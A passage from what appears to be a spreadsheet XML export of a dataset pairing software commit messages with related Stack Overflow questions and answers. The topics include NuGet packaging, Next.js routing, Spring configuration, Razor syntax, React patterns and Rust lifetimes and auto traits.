    <t>Issue #9 Add concrete examples to README.MD
Added examples for installing, configuring, initialising and using Femah
in the most basic scenarios.
There is a lot we can do to reduce down the installation steps using
native NuGet, for e.g.
- Step '2. Register the Femah HTTP handlers within your app' can use
config transformations to automatically add the HTTP handler
registrations, see
http://docs.nuget.org/docs/creating-packages/configuration-file-and-source-code-transformations
- Step '3. Initialise Femah within your app' can also use NuGet to copy
a default class with a predefined Enum to a specified location, see
http://stackoverflow.com/questions/10785596/can-nuget-add-a-cs-file-to-the-destination-project
Before implementing any of the above within the NuGet package
installation natively we could investigate bundling our own PowerShell
CmdLet/Module that would allow users to selectively configure their app
post NuGet Package installation (following our approach of being
un-intrusive to the host app).  Certainly not required for MVP but
thoughts?</t>
  </si>
  <si>
    <t>Just put your .cs file in a folder called "content", at the root of the package.
from the docs:
"you can layout a directory structure that follows the NuGet conventions.
tools
- The tools folder of a package is for PowerShell scripts and programs accessible from the Package Manager Console. After the folder is copied to the target project, it is added to the `$env:Path (PATH) environment variable.
lib
- Assemblies (.dll files) in the lib folder are added as assembly references when the package is installed.
content
- Files in the content folder are copied to the root of your application when the package is installed.
Think of the Content folder as the root of your target application. For example, if I want a package to add an image in the /images directory of the target application, make sure to place the image in the Content/images folder of the package."
see:
http://docs.nuget.org/docs/creating-packages/creating-and-publishing-a-package#From_a_convention_based_working_directory</t>
  </si>
  <si>
    <t xml:space="preserve">We are in the process of porting a legacy system to .NET, both to clean up architecture but also to take advantage of lots of new possibilities that just aren't easily done in the legacy system.
Note: When reading my post before submitting it I notice that I may have described things a bit too fast in places, ie. glossed over details. If there is anything that is unclear, leave a comment (not an answer) and I'll augment as much as possible
The legacy system uses a database, and 100% custom written SQL all over the place. This has lead to wide tables (ie. many columns), since code that needs data only retrieves what is necessary for the job.
As part of the port, we introduced an ORM layer which we can use, in addition to custom SQL. The ORM we chose is DevExpress XPO, and one of the features of this has also lead to some problems for us, namely that when we define a ORM class for, say, the Employee table, we have to add properties for all the columns, otherwise it won't retrieve them for us.
This also means that when we retrieve an Employee, we get all the columns, even if we only need a few.
One nice thing about having the ORM is that we can put some property-related logic into the same classes, without having to duplicate it all over the place. For instance, the simple expression to combine first, middle and last name into a "display name" can be put down there, as an example.
However, if we write SQL code somewhere, either in a DAL-like construct or, well, wherever, we need to duplicate this expression. This feels wrong and looks like a recipe for bugs and maintenance nightmare.
However, since we have two choices:
ORM, fetches everything, can have logic written once
SQL, fetches what we need, need to duplicate logic
Then we came up with an alternative. Since the ORM objects are code-generated from a dictionary, we decided to generate a set of dumb classes as well. These will have the same number of properties, but won't be tied to the ORM in the same manner. Additionally we added interfaces for all of the objects, also generated, and made both the ORM and the dum objects implement this interface.
This allowed us to move some of this logic out into extension methods tied to the interface. Since the dumb objects carry enough information for us to plug them into our SQL-classes and instead of getting a DataTable back, we can get a List back, with logic available, this looks to be working.
However, this has lead to another issue. If I want to write a piece of code that only displays or processes employees in the context that I need to know who they are (ie. their identifier in the system), as well as their name (first, middle and last), if I use this dumb object, I have no guarantee by the compiler that the code that calls me is really providing all this stuff.
One solution is for us to make the object know which properties have been assigned values, and an attempt to read an unassigned property crashes with an exception. This gives us an opportunity at runtime to catch contract breaches where code is not passing along enough information.
This also looks clunky to us.
So basically what I want advice on is if anyone else has been in, or are in, this situation and any tips or advice you can give.
We can not, at the present time, break up the tables. The legacy application will still have to exist for a number of years due to the size of the port, and the .NET code is not a in-3-years-release type of project but will be phased in in releases along the way. As such, both the legacy system and the .NET code need to work with the same tables.
We are also aware that this is not an ideal solution so please refrain from advice like "you shouldn't have done it like this". We are well aware of this :)
One thing we've looked into is to create an XML file, or similar, with "contracts". So we could put into this XML file something like this:
There is an Employee class with these 50 properties
Additionally, we have these 7 variations, for various parts of the program
Additionally, we have these 10 pieces of logic, that each require property X, Y and Z (X, Y and Z varies between those 10)
This could allow us to code-generate those 8 classes (full class + 7 smaller variations), and have the generator detect that for variation #3, property X, Y and K is present, and I can then tie in either the code for the logic or the interfaces the logic needs into this class automagically. This would allow us to have a number of different types of employee classes, with varying degrees of property coverage, and have the generator automatically add all logic that would be supported by this class to it.
My code could then say that I need an employee of type IEmployeeWithAddressAndPhoneNumbers.
This too looks clunky.
</t>
  </si>
  <si>
    <t>C269</t>
  </si>
  <si>
    <t>Enhancement prebaked tdd suite (#76)
* including mocha and prebuilt - app continues to work as before
* slight refactor of the module exports used in datapackage
* inclusion of conditional export depending on test env to modify interface to datapackage
* test examples added, the blocker here is the interface exposing problems described here http://engineering.clever.com/2014/07/29/testing-private-functions-in-javascript-modules/
process.env when executed via electron-mocha doesn't tally with a NODE_ENV attribute
* an implementation of how to access private methods when using module exports interface - there is some debate on the matter as to which pattern to pursue
http://stackoverflow.com/questions/22097603/unit-testing-of-private-functions-with-mocha-and-node-js</t>
  </si>
  <si>
    <t>If the function is not exported by the module, it cannot be called by test code outside the module. That's due to how JavaScript works, and Mocha cannot by itself circumvent this.
In the few instances where I determined that testing a private function is the right thing to do, I've set some environment variable that my module checks to determine whether it is running in a test setup or not. If it runs in the test setup, then it exports additional functions that I can then call during testing.
The word "environment" is loosely used here. It might mean checking
process.env
or something else that can communicate to the module "you're being tested now". The instances where I've had to do this were in a
RequireJS
environment, and I've used
module.config
for this purpose.</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I wrote a python project that automates tasks and makes use of the smartsheet api but when I package this project into an executable with nuitka I get the error:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;ImportError! Could not load api or model class Search
Error: 'str' object has no attribute 'search_sheet'
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;this is the piece of code that throws this error&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;from smartsheet import smartsheet
...
smart = smartsheet.Smartsheet(&amp;quot;api key&amp;quot;,proxies=proxies)  #  Create a Smartsheet client
    response = smart.errors_as_exceptions(True)     #  Call the list_sheets() function and store the response object
    NonFoundSerialNumbers=&amp;quot;&amp;quot;
    try:
        SerialNumbers=SerialNumbers.split(&amp;quot; &amp;quot;)
        for search in SerialNumbers:
            response=smart.Search.search_sheet(sheetID,search)
            if len(response.results)==0:
                NonFoundSerialNumbers=NonFoundSerialNumbers+&amp;quot;\n&amp;quot;+search
etc ...
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This error makes me believe that the smartsheet client is not being created due to an import error of some sort when packaging the project. This is my yaml file for reference:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;# nuitka.yaml
# Main configuration for the Nuitka build
- module-name: Helper
  nuitka:
    # Project Information
    ...
    standalone: true
    onefile: true
    # Entry point for the application
    entry_point: &amp;quot;Helper.py&amp;quot;
    # Include packages and modules
    include_packages:
      - UI
      - Core
      - Scripts
      - PIL  # Pillow
      - cv2  # opencv-python
    include_modules:
      - mss
      - pytesseract
      - requests
      - json
      - keyboard
      - MouseInfo
      - PyDirectInput
      - PyGetWindow
      - PyMsgBox
      - pyperclip
      - PyRect
      - PyScreeze
      - python_dateutil
      - pytweening
      - pywin32
      - requests_toolbelt
      - setuptools
      - six
      - smartsheet_python_sdk
      - smartsheet
      - tqdm
      - zstandard
      - urllib3
      - tzdata
      - certifi
      - charset_normalizer # Included from requirements
      - idna # Included from requirements
      - smartsheet.models
      - smartsheet.sheets
      - smartsheet.search
      - smartsheet.attachments
      - smartsheet.saml
      - smartsheet.groups
      - smartsheet.reports
      - smartsheet.sights
      - smartsheet.workspaces
      - smartsheet.Smartsheet
      - smartsheet.search_sheet
    # Include data directories and files
    include_data_dirs:
      - Resources=.  # Put Resources directory at the root of the extracted executable environment
    # Windows specific settings (optional)
    windows:
      icon_from_ico: &amp;quot;./Resources/Pictures/HammerIcon.ico&amp;quot;
    # Plugins
    plugins:
      - tk_inter # Tkinter and CustomTkinter
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;And this is the command I'm running&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;nuitka --standalone --onefile --enable-plugin=tk-inter --follow-imports --user-package-configuration-file=Helper.yaml Helper.py
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Note: Everything works perfectly when running the project from my editor&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C27</t>
  </si>
  <si>
    <t>You should move your components outside the pages folder. pages/ shou
ld only be used for page components as Next.js routing is based on its structure.
https://stackoverflow.com/questions/65598753/cant-build-react-next-project-found-page-without-a-react-component-as-default. To resolve the localized error &gt; Build optimization failed: found pages without a React Component as default export in
pages/redux/reducer2
pages/redux/reducer1, deletes the pages reducer2.js and reducer1.js .</t>
  </si>
  <si>
    <t>You should move your components outside the pages folder. pages/ should only be used for page components as Next.js routing is based on its structure.
Next.js has a file-system based router built on the concept of pages.
When a file is added to the pages directory it's automatically available as a route.
By default, Next.js assumes anything under the pages folder is a page component and will try to build each file as a page.
Even though the above is the default behaviour, you can configure your Next.js app to include non-page files in the pages directory.
To do so, you can modify the pageExtensions entry in the next.config.js file as shown below. Then rename your page components to have a file extension that includes .page (_document.page.js, _app.page.js, index.page.js, etc).
module.exports = {
    pageExtensions: ['page.tsx', 'page.ts', 'page.jsx', 'page.js']
}
With this configuration, Next.js will ignore any file that doesn't contain .page for the purpose of building pages/API routes and routing.</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;The dependency is:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;implementation(&amp;quot;androidx.health.connect:connect-client:1.1.0-alpha11&amp;quot;)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The error code that appears is:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Caused by: org.gradle.workers.internal.DefaultWorkerExecutor$WorkExecutionException: A failure occurred while executing com.android.build.gradle.internal.tasks.CheckAarMetadataWorkAction
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I've tried updating the gradle, gradle plugin, changing the compile sdk version, and downgrading the dependency.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C270</t>
  </si>
  <si>
    <t>changes to fix a problem with Gradescope autograder
Gradescope autograder for team01 was failing with the
error:
java.lang.IllegalStateException: Failed to load ApplicationContext
Caused by: org.springframework.context.ApplicationContextException: Failed to start bean documentationPluginsBootstrapper; nested exception is java.lang.NullPointerException: Cannot invoke "org.springframework.web.servlet.mvc.condition.PatternsRequestCondition.getPatterns()" because "this.condition" is null
Caused by: java.lang.NullPointerException: Cannot invoke "org.springframework.web.servlet.mvc.condition.PatternsRequestCondition.getPatterns()" because "this.condition" is null
The fix was found by Prof. Conrad and tested by Robert Briggs, and comes
from this stack overflow answer:
https://stackoverflow.com/a/70892119</t>
  </si>
  <si>
    <t>The workaround mentioned in the below issue comment seems to be working for people with spring actuator as well. Just changing the path matcher won't work for projects using actuator.
Set  in application.properties file:
spring.mvc.pathmatch.matching-strategy to ant_path_matcher
Add the @Bean below:
@Bean
public WebMvcEndpointHandlerMapping webEndpointServletHandlerMapping(
                WebEndpointsSupplier webEndpointsSupplier, 
                ServletEndpointsSupplier servletEndpointsSupplier, 
                ControllerEndpointsSupplier controllerEndpointsSupplier, 
                EndpointMediaTypes endpointMediaTypes,
                CorsEndpointProperties corsProperties, 
                WebEndpointProperties webEndpointProperties, 
                Environment environment) {
    List&lt;ExposableEndpoint&lt;?&gt;&gt; allEndpoints = new ArrayList();
    Collection&lt;ExposableWebEndpoint&gt; webEndpoints = webEndpointsSupplier.getEndpoints();
    allEndpoints.addAll(webEndpoints);
    allEndpoints.addAll(servletEndpointsSupplier.getEndpoints());
    allEndpoints.addAll(controllerEndpointsSupplier.getEndpoints());
    String basePath = webEndpointProperties.getBasePath();
    EndpointMapping endpointMapping = new EndpointMapping(basePath);
    boolean shouldRegisterLinksMapping = this.shouldRegisterLinksMapping(
                webEndpointProperties, environment, basePath);
    return new WebMvcEndpointHandlerMapping(endpointMapping, webEndpoints, 
                endpointMediaTypes, corsProperties.toCorsConfiguration(), 
                new EndpointLinksResolver(allEndpoints, basePath), 
                shouldRegisterLinksMapping, null);
}
private boolean shouldRegisterLinksMapping(WebEndpointProperties webEndpointProperties, 
                                           Environment environment, String basePath) {
    return webEndpointProperties.getDiscovery().isEnabled() &amp;&amp; 
                (StringUtils.hasText(basePath) || 
                ManagementPortType.get(environment).equals(ManagementPortType.DIFFERENT));
}
Reference:
https://github.com/springfox/springfox/issues/3462#issuecomment-1010721223</t>
  </si>
  <si>
    <t xml:space="preserve">How does one design loosely-coupled systems which may often require data from each-other but don't necessarily belong in the same category?
For instance, lets take the old Pet-shop example one-step further and create a pet-store franchise. Each pet-store has its own website listing their contact information, promotions, and current stock. 
The franchise owners want to have a listing of all the franchised pet-stores along with contact information and possibly a few photos available on their corporate site. They want to be able to update this information, and have any updates pushed automatically both-ways. They also want to provide the promotions information to all stores' sites in an automated way.
So, in this instance the stock lists are "owned" by the stores, and the contact information is part-"owned" by both entities, and the promotion information is "owned" by HQ. Due to arbitrary reasons all this data can't be stored in the same place.
Are there some best-practices or common strategies for coping with a situation like this?
</t>
  </si>
  <si>
    <t>C271</t>
  </si>
  <si>
    <t>Fixed several issues appeared after moving to MVC 4.
&gt; Our custom "LabelFor" method in "HtmlExtensions" is not required anymore (available out of the box in MVC 4)
&gt; Razor syntax now do not accept "@string.Format" inside code blocks in cshtml files. Weird, but it accepts "@String.format" (uppercase).
Note: see the following stackoverflow question - http://stackoverflow.com/questions/12685827/asp-net-mvc-3-and-asp-net-mvc-4-razor-syntax-changes</t>
  </si>
  <si>
    <t>We had a similar issue when upgrading... it appears that simply writing
@string.Format("{0}", "test")
will no longer write directly onto the page as it did in MVC3. You instead have to do something like this:
&lt;div&gt;
@if (true)
{
      Html.Raw(string.Format("{0}", "test"));
}
&lt;/div&gt;
or
&lt;div&gt;
@if (true)
{
      &lt;text&gt;@string.Format("{0}", "test"))&lt;/text&gt; //added @ to evaluate the expression instead of treating as string literal
}
&lt;/div&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;If I have a string:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Something (perhaps) Something (Whatever) Something (Fred)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I want to be able to extract the word &lt;code&gt;Fred&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;In my mind, this means finding the &lt;em&gt;last&lt;/em&gt; open bracket/parenthesis. Or, if I were able to work backwards from the right, I'd say let's find the &lt;em&gt;first&lt;/em&gt; open bracket/parenthesis. I'm not sure which method would work more quickly, or which would be easier to code! On the whole, I'm inclined to ask for the 'working from the right' approach, because that seems to me something I'd have wider use for.&lt;/p&gt;
&lt;p&gt;In summary: given a string with lots of open/close brackets, how do I best extract the text contained within the &lt;em&gt;last&lt;/em&gt; pair of brackets, please?&lt;/p&gt;
&lt;p&gt;Ideally, there'd be an incredibly simple Bash parameter expansion trick that would work the required magic, but if it has to be regexes, so be it!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C272</t>
  </si>
  <si>
    <t>Move user location watching logic to app level
Allows user location to be used by multiple components (both map and
list views).
Thanks to https://stackoverflow.com/a/39507596/2441263 for the help.</t>
  </si>
  <si>
    <t>There's nothing wrong if you need to access the parent's props and functions from the children.
The point is that you should never use React internals and undocumented APIs.
First of all, they are likely to change (breaking your code) and, most importantly, there are many other approaches which are cleaner.
Passing props to children
class Parent extends React.Component {
    constructor(props) {
        super(props)
        this.fn = this.fn.bind(this)
    }
    fn() {
        console.log('parent')
    }
    render() {
        return &lt;Child fn={this.fn} /&gt;
    }
}
const Child = ({ fn }) =&gt; &lt;button onClick={fn}&gt;Click me!&lt;/button&gt;
Working example
Using context (if there's no direct parent/child relation)
class Parent extends React.Component {
    constructor(props) {
        super(props)
        this.fn = this.fn.bind(this)
    }
    getChildContext() {
        return {
            fn: this.fn,
        }
    }
    fn() {
        console.log('parent')
    }
    render() {
        return &lt;Child fn={this.fn} /&gt;
    }
}
Parent.childContextTypes = {
    fn: React.PropTypes.func,
}
const Child = (props, { fn }) =&gt; &lt;button onClick={fn}&gt;Click me!&lt;/button&gt;
Child.contextTypes = {
    fn: React.PropTypes.func,
}
Working example</t>
  </si>
  <si>
    <t xml:space="preserve">I'm looking for a consistent way to structure my use of formatting strings throughout a large web application, and I'm looking for recommendations or best practices on which way to go.
Up until now I've had a static class that does some common formatting e.g.
Formatting.FormatCurrency
Formatting.FormatBookingReference
I'm not convinced that this is the way to go though, I'd prefer to use the standard way of formatting strings within .NET directly and use:
amount.ToString("c")
reference.ToString("000000")
Id use IFormattable and ICustomFormatter for some of our more complicated data structures, but I'm struggling what to do about the more simple existing objects that we need to format (in this case Int32 but also DateTime). 
Do I simply define constants for "c" and "000000" and use them consistently around the whole web app or is there a more standard way to do it?
</t>
  </si>
  <si>
    <t>C273</t>
  </si>
  <si>
    <t>update imported components; add simplified route authentication
credit for authentication implementation (modified for use here): https://stackoverflow.com/a/52620846 (@mayankshubham)</t>
  </si>
  <si>
    <t>Instead of writing hardcoded routes for authentication, you should instead write an AuthRoute HOC,
const AuthRoute = ({component: Component, ...rest}) =&gt; {
    if(isAuth) {
        return &lt;Route {...rest} component={Component} /&gt;
    }
    return &lt;Redirect to="/" /&gt;
}
and use it like
&lt;React.Fragment&gt;
      {/* &lt;Redirect exact from="/" to="/dashboard" /&gt; */}
      &lt;AuthRoute path="/" exact component={props =&gt; &lt;Dashboard {...props} /&gt;} /&gt;
      &lt;AuthRoute path="/dashboard" exact component={props =&gt; &lt;Dashboard {...props} /&gt;} /&gt;
      &lt;AuthRoute path="/settings/" exact component={props =&gt; &lt;Settings {...props} /&gt;} /&gt;
 &lt;/React.Fragment&gt;
Any Route that you do not want to Authenticate, will be written down as a normal Route</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;@cafce25 Was able to reduce my question to the following, minimal example:&lt;/p&gt;
&lt;p&gt;This:&lt;/p&gt;
&lt;pre class="lang-rust prettyprint-override"&gt;&lt;code&gt;
pub fn filter()
{
}
pub fn filter_with&amp;lt;F, I, O&amp;gt;(f: F)
where
    F: Fn(&amp;amp;I) -&amp;gt; O,
{
}
pub fn filter2()
{
    filter_with(std::convert::identity::&amp;lt;&amp;amp;()&amp;gt;)
}
fn id&amp;lt;T&amp;gt;(x: &amp;amp;T) -&amp;gt; &amp;amp;T { x }
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Fails to compile, with this warning:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;error: implementation of `Fn` is not general enough
  --&amp;gt; src/lib.rs:14:5
   |
14 |     filter_with(std::convert::identity::&amp;lt;&amp;amp;()&amp;gt;)
   |     ^^^^^^^^^^^ implementation of `Fn` is not general enough
   |
   = note: `fn(&amp;amp;'2 ()) -&amp;gt; &amp;amp;'2 () {identity::&amp;lt;&amp;amp;'2 ()&amp;gt;}` must implement `Fn&amp;lt;(&amp;amp;'1 (),)&amp;gt;`, for any lifetime `'1`...
   = note: ...but it actually implements `Fn&amp;lt;(&amp;amp;'2 (),)&amp;gt;`, for some specific lifetime `'2`
error: implementation of `FnOnce` is not general enough
  --&amp;gt; src/lib.rs:14:5
   |
14 |     filter_with(std::convert::identity::&amp;lt;&amp;amp;()&amp;gt;)
   |     ^^^^^^^^^^^ implementation of `FnOnce` is not general enough
   |
   = note: `fn(&amp;amp;'2 ()) -&amp;gt; &amp;amp;'2 () {identity::&amp;lt;&amp;amp;'2 ()&amp;gt;}` must implement `FnOnce&amp;lt;(&amp;amp;'1 (),)&amp;gt;`, for any lifetime `'1`...
   = note: ...but it actually implements `FnOnce&amp;lt;(&amp;amp;'2 (),)&amp;gt;`, for some specific lifetime `'2`
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I still do not understand the error, though. As far as I can tell, &lt;code&gt;std::convert::identity&lt;/code&gt; definitely fits the pattern `F(&amp;amp;I) -&amp;gt; O.&lt;/p&gt;
&lt;p&gt;My original question is preserved below:&lt;/p&gt;
&lt;p&gt;I have a codebase with two functions:&lt;/p&gt;
&lt;pre class="lang-rust prettyprint-override"&gt;&lt;code&gt;use mongodb::bson::{self, doc, Bson};
use std::ops::{Bound, RangeBounds};
/// Creates a mongodb filter object for a given field with a given range:
///
/// `filter(&amp;quot;foo&amp;quot;, 0..10)` will return `{ &amp;quot;foo&amp;quot;: { &amp;quot;$gte&amp;quot;: 0, &amp;quot;$lt&amp;quot;: 10 } }`
/// `filter(&amp;quot;foo&amp;quot;, 0..)` will return `{ &amp;quot;foo&amp;quot;: { &amp;quot;$gte&amp;quot;: 0 } }`
/// `filter(&amp;quot;foo&amp;quot;, ..)` will return `{}`
pub(super) fn filter&amp;lt;S, R, T&amp;gt;(field: S, range: R) -&amp;gt; bson::Document
where
    S: Into&amp;lt;String&amp;gt;,
    R: RangeBounds&amp;lt;T&amp;gt;,
    T: Clone + Into&amp;lt;Bson&amp;gt;,
{
    let mut filter = doc! {};
    match range.start_bound() {
        Bound::Included(t) =&amp;gt; filter.insert(&amp;quot;$gte&amp;quot;, t),
        Bound::Excluded(t) =&amp;gt; filter.insert(&amp;quot;$gt&amp;quot;, t),
        Bound::Unbounded =&amp;gt; None,
    };
    match range.end_bound() {
        Bound::Included(t) =&amp;gt; filter.insert(&amp;quot;$lte&amp;quot;, t),
        Bound::Excluded(t) =&amp;gt; filter.insert(&amp;quot;$lt&amp;quot;, t),
        Bound::Unbounded =&amp;gt; None,
    };
    if filter.keys().next().is_some() {
        doc! { field.into(): filter }
    } else {
        doc! {}
    }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The first function is a utility function that converts some &lt;code&gt;RangeBounds&lt;/code&gt; into a mongodb-style filter.&lt;/p&gt;
&lt;p&gt;Recently, I added this variant, to support filters that need some mapping function to be marshalled into a DB-compatible format:&lt;/p&gt;
&lt;pre class="lang-rust prettyprint-override"&gt;&lt;code&gt;/// A version of `filter` that applies a mapping function to every returned
/// value
pub(super) fn filter_with&amp;lt;S, R, I, F, O&amp;gt;(field: S, range: R, f: F) -&amp;gt; bson::Document
where
    S: Into&amp;lt;String&amp;gt;,
    R: RangeBounds&amp;lt;I&amp;gt;,
    O: Into&amp;lt;Bson&amp;gt;,
    F: Fn(&amp;amp;I) -&amp;gt; O,
{
    let mut filter = doc! {};
    match range.start_bound() {
        Bound::Included(t) =&amp;gt; filter.insert(&amp;quot;$gte&amp;quot;, (f)(t)),
        Bound::Excluded(t) =&amp;gt; filter.insert(&amp;quot;$gt&amp;quot;, (f)(t)),
        Bound::Unbounded =&amp;gt; None,
    };
    match range.end_bound() {
        Bound::Included(t) =&amp;gt; filter.insert(&amp;quot;$lte&amp;quot;, (f)(t)),
        Bound::Excluded(t) =&amp;gt; filter.insert(&amp;quot;$lt&amp;quot;, (f)(t)),
        Bound::Unbounded =&amp;gt; None,
    };
    if filter.keys().next().is_some() {
        doc! { field.into(): filter }
    } else {
        doc! {}
    }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;As you can see, &lt;code&gt;filter&lt;/code&gt; and &lt;code&gt;filter_with&lt;/code&gt; are essentially copies of each other. The only difference is the &lt;code&gt;(f)(t)&lt;/code&gt; in the match statements.&lt;/p&gt;
&lt;p&gt;To me, this seemed like the perfect case for generalization. I tried to replace &lt;code&gt;filter&lt;/code&gt; with this:&lt;/p&gt;
&lt;pre class="lang-rust prettyprint-override"&gt;&lt;code&gt;pub(super) fn filter2&amp;lt;S, R, T&amp;gt;(field: S, range: R) -&amp;gt; bson::Document
where
    S: Into&amp;lt;String&amp;gt;,
    R: RangeBounds&amp;lt;T&amp;gt;,
    T: 'static + Clone + Into&amp;lt;Bson&amp;gt;,
{
    filter_with(field, range, std::convert::identity)
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;As far as I can see, this should be identical to the original &lt;code&gt;filter&lt;/code&gt; in function. However, I get this puzzling error when I try to compile:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;error: implementation of `Fn` is not general enough
   --&amp;gt; ses/src/db/util.rs:110:5
    |
110 |     filter_with(field, range, std::convert::identity)
    |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ implementation of `Fn` is not general enough
    |
    = note: `fn(&amp;amp;'2 T) -&amp;gt; &amp;amp;'2 T {identity::&amp;lt;&amp;amp;'2 T&amp;gt;}` must implement `Fn&amp;lt;(&amp;amp;'1 T,)&amp;gt;`, for any lifetime `'1`...
    = note: ...but it actually implements `Fn&amp;lt;(&amp;amp;'2 T,)&amp;gt;`, for some specific lifetime `'2`
error: implementation of `FnOnce` is not general enough
   --&amp;gt; ses/src/db/util.rs:110:5
    |
110 |     filter_with(field, range, std::convert::identity)
    |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ implementation of `FnOnce` is not general enough
    |
    = note: `fn(&amp;amp;'2 T) -&amp;gt; &amp;amp;'2 T {identity::&amp;lt;&amp;amp;'2 T&amp;gt;}` must implement `FnOnce&amp;lt;(&amp;amp;'1 T,)&amp;gt;`, for any lifetime `'1`...
    = note: ...but it actually implements `FnOnce&amp;lt;(&amp;amp;'2 T,)&amp;gt;`, for some specific lifetime `'2`
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Note that &lt;code&gt;Bson&lt;/code&gt; has a blanket &lt;code&gt;From&lt;/code&gt; impl like so: &lt;code&gt;Bson: From&amp;lt;&amp;amp;T&amp;gt; where T: Into&amp;lt;Bson&amp;gt; + Clone&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;What causes this error? Where do the lifetimes &lt;code&gt;'2&lt;/code&gt; and &lt;code&gt;'1&lt;/code&gt; come from? As far as I can tell, &lt;code&gt;std::convert::identity&lt;/code&gt; should work over all lifetimes. Why is &lt;code&gt;filter2&lt;/code&gt; different at all? It has identical behavior.&lt;/p&gt;
&lt;p&gt;Extra weirdly, if I manually monomorphize &lt;code&gt;filter_with&lt;/code&gt; using &lt;code&gt;std::convert::identity&lt;/code&gt;, it compiles!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C274</t>
  </si>
  <si>
    <t>Convert points with components of one type to another
See:
rust-lang/rust#42721 (comment)
And:
https://stackoverflow.com/questions/49710852/what-is-an-auto-trait-in-rust</t>
  </si>
  <si>
    <t>An auto trait is the new name for the terribly named1 opt-in, built-in trait (OIBIT).
These are an unstable feature where a trait is automatically implemented for every type unless they opt-out or contain a value that does not implement the trait:
#![feature(optin_builtin_traits)]
auto trait IsCool {}
// Everyone knows that `String`s just aren't cool
impl !IsCool for String {}
struct MyStruct;
struct HasAString(String);
fn check_cool&lt;C: IsCool&gt;(_: C) {}
fn main() {
    check_cool(42);
    check_cool(false);
    check_cool(MyStruct);
    // the trait bound `std::string::String: IsCool` is not satisfied
    // check_cool(String::new());
    // the trait bound `std::string::String: IsCool` is not satisfied in `HasAString`
    // check_cool(HasAString(String::new()));
}
Familiar examples include Send and Sync:
pub unsafe auto trait Send { }
pub unsafe auto trait Sync { }
Further information is available in the Unstable Book.
1 These traits are neither opt-in (they are opt-out) nor necessarily built-in (user code using nightly may use them). Of the 5 words in their name, 4 were outright lies.</t>
  </si>
  <si>
    <t xml:space="preserve">I find myself attached to a project to integerate an interpreter into an existing application. The language to be interpreted is a derivative of Lisp, with application-specific builtins. Individual 'programs' will be run batch-style in the application.
I'm surprised that over the years I've written a couple of compilers, and several data-language translators/parsers, but I've never actually written an interpreter before. The prototype is pretty far along, implemented as a syntax tree walker, in C++. I can probably influence the architecture beyond the prototype, but not the implementation language (C++). So, constraints:
implementation will be in C++
parsing will probably be handled with a yacc/bison grammar (it is now)
suggestions of full VM/Interpreter ecologies like NekoVM and LLVM are probably not practical for this project. Self-contained is better, even if this sounds like NIH.
What I'm really looking for is reading material on the fundamentals of implementing interpreters. I did some browsing of SO, and another site known as [external-link], though they are more oriented toward programming language theory.
Some of the tidbits I've gathered so far:
[external-link], by Christian Queinnec. The person recommending it said it "goes from the trivial interpreter to more advanced techniques and finishes presenting bytecode and 'Scheme to C' compilers."
[external-link]. As I've mentioned above, I doubt that we'd be allowed to incorporate an entire VM framework to support this project.
[external-link]. Originally I suggested that this might be overkill, but having worked through a healthy chunk, I agree with @JBF. Very informative, and mind-expanding.
[external-link] by Paul Graham. I've read this, and while it is an informative introduction to Lisp principles, is not enough to jump-start constructing an interpreter.
[external-link]. This seems like a fun read. Not sure it will provide me with the fundamentals.
[external-link]. Peter Michaux is attacking various implementations of Scheme, from a quick-and-dirty Scheme interpreter written in C (for use as a bootstrap in later projects) to compiled Scheme code. Very interesting so far.
[external-link], recommended in the comment thread for [external-link]. The book contains two chapters devoted to the practice of building interpreters, so I'm adding it to my reading queue.
New (and yet Old, i.e. 1979): [external-link] by P. J. Brown. This is long out of print, but is interesting in providing an outline of the various tasks associated with the implementation of a Basic interpreter. I've seen mixed reviews for this one but as it is cheap (I have it on order used for around $3.50) I'll give it a spin.
So how about it? Is there a good book that takes the neophyte by the hand and shows how to build an interpreter in C/C++ for a Lisp-like language? Do you have a preference for syntax-tree walkers or bytecode interpreters?
To answer @JBF:
the current prototype is an interpreter, and it makes sense to me as we're accepting a path to an arbitrary code file and executing it in our application environment. The builtins are used to affect our in-memory data representation.
it should not be hideously slow. The current tree walker seems acceptable.
The language is based on Lisp, but is not Lisp, so no standards compliance required.
As mentioned above, it's unlikely that we'll be allowed to add a full external VM/interpreter project to solve this problem.
To the other posters, I'll be checking out your citations as well. Thanks, all!
</t>
  </si>
  <si>
    <t>C275</t>
  </si>
  <si>
    <t>Make the EllipsisTextTooltip a block component
Based on the following article, the scrollWidth is not alwasy working especially in chrome. We are changing the component to a block component.
https://stackoverflow.com/questions/13226296/is-scrollwidth-property-of-a-span-not-working-on-chrome
Also let TrucatedText component supports `never` addTooltip</t>
  </si>
  <si>
